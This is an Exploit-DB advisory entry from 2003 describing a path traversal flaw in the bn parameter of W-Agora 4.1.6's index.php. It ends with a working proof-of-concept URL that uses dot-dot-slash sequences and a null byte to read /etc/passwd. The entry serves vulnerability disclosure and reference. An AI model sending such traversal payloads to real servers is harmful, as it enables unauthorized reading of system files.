W-Agora 4.1.6 index.php bn Parameter Traversal Arbitrary File Access

2003-01-13T00:00:00
ID EDB-ID:22149
Type exploitdb
Reporter sonyy
Modified 2003-01-13T00:00:00

Description

W-Agora 4.1.6 index.php bn Parameter Traversal Arbitrary File Access. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/6595/info

A file disclosure vulnerability has been reported for W-Agora. It has been reported that W-Agora does not adequately sanitize some user-supplied input.

An attacker can construct a URL consisting of dot-dot-slash (../) character sequences to obtain access to files outside of the document root. It should be noted that only files accessible by the web server will be disclosed to the attacker. 

http://target/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00